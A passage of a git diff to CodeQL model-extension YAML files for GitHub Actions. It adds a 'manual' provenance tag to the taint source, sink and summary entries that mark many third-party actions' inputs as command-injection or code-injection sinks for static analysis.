"manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index f45aae02158d..5b0a9dab38d7 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"] - - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"] + - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] + - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 7445d673fcf7..35bbd72f0a4d 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"] - - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"] + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 3bc1dcc4759d..f90eaeb7271b 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details"] + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 82f491390d2e..1647e5607304 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] \ No newline at end of file + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index 430a96f6cbef..bbdad8287dd3 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"] - - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"] \ No newline at end of file + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection", "manual"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index 37bcf2cc7815..f3ac66006d99 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"] - - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"] - - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index 77eaf3ae10f8..9189245e2289 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["docker/build-push-action", "*", "input.context", "code-injection"] \ No newline at end of file + - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 41a9c337f490..14743f2819ed 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "PR changed files"] + - ["dorny/paths-filter", "*", "output.changes", "PR changed files", "manual"] diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index 63cdb2a496b0..bd64fc374236 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["endbug/latest-tag", "*", "input.ref", "command-injection"] - - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"] - - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"] - - ["endbug/latest-tag", "*", "input.description", "command-injection"] + - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] + - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] + - ["endbug/latest-tag", "*", "input.git-directory", "command-injection", "manual"] + - ["endbug/latest-tag", "*", "input.description", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index d0bcbb4da989..9a20279e1103 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expo/expo-github-action", "*", "input.command", "command-injection"] - - ["expo/expo-github-action", "*", "input.packager", "command-injection"] + - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] + - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index 6418e71f22a4..8d06bc8a5121 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"] + - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 760b7cd46e72..9d066ac23ecd 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] - - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index b6c75a06e576..ecfce617df45 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body"] - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body", "manual"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 86705319e23d..563da9d4c0f4 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"] - - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"] \ No newline at end of file + - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] + - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 61fdcd9254a4..5194ce500fb1 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"] - - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"] + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index 2d142d98099b..8c2f32627d90 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] \ No newline at end of file + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index 1727ca60e258..f74ae81a52c8 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"] \ No newline at end of file + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index e6688f3805d0..c7e2cf41b3f6 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["getsentry/action-release", "*", "input.version", "output.version", "taint"] - - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] + - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index b214178350c9..781384a2fe19 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"] + - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 146f4a17a559..9036f199f424 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["go-semantic-release/action", "*", "input.bin", "command-injection"] + - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 8c0f7a5ad614..7eee95dbcce4 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"] + - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 9c7c03b9f357..4fe9e32ce521 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"] - - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"] + - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] + - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 9d9eac38af01..0352ece87b52 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"] + - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index 4c74301d1c35..712f2ce3395c 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"] - - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"] - - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"] - - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"] \ No newline at end of file + - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection", "manual"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 0534d299627b..45c00c1c30ea 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"] - - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"] - - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] + - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index a8a528b85c5a..8f05918155ed 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"] - - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] + - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 6a907fcc3a19..708c310c05f4 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"] + - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 6332cbfdad8e..761776358994 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"] - - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"] - - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"] - - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"] \ No newline at end of file + - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] + - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"] + - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection", "manual"] + - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index f8b8490c2135..7106115c17a2 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ilammy/setup-nasm", "*", "input.version", "command-injection"] - - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"] + - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] + - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 64024ef5c72d..366e5dd17667 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"] - - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"] - - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"] \ No newline at end of file + - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index 1771ac2bad05..a469063fc503 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["iterative/setup-cml", "*", "input.version", "command-injection"] + - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index e8600c6f7df5..d0d5b57574b5 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["iterative/setup-dvc", "*", "input.version", "command-injection"] + - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 2ab70905db16..3151e335d22d 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"] - - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index 2e5b0d42efdc..38253b689340 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files", "manual"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 948be24b45cd..0930fc246c38 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"] + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index f1a04c9e2441..5b344799ad95 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint"] - - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint"] - - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint"] + - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] + - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"] + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index 928c1f918d3f..5b6f1342fc42 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jurplel/install-qt-action", "*", "input.version", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"] - - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index ad95f1f323a7..b34833d85f3a 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint"] + - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection"] - - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection"] - - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection"] + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 18339bfa4e9b..bbfc0bed1dfb 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index abfca93b4ec9..74ef5820cb7a 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: 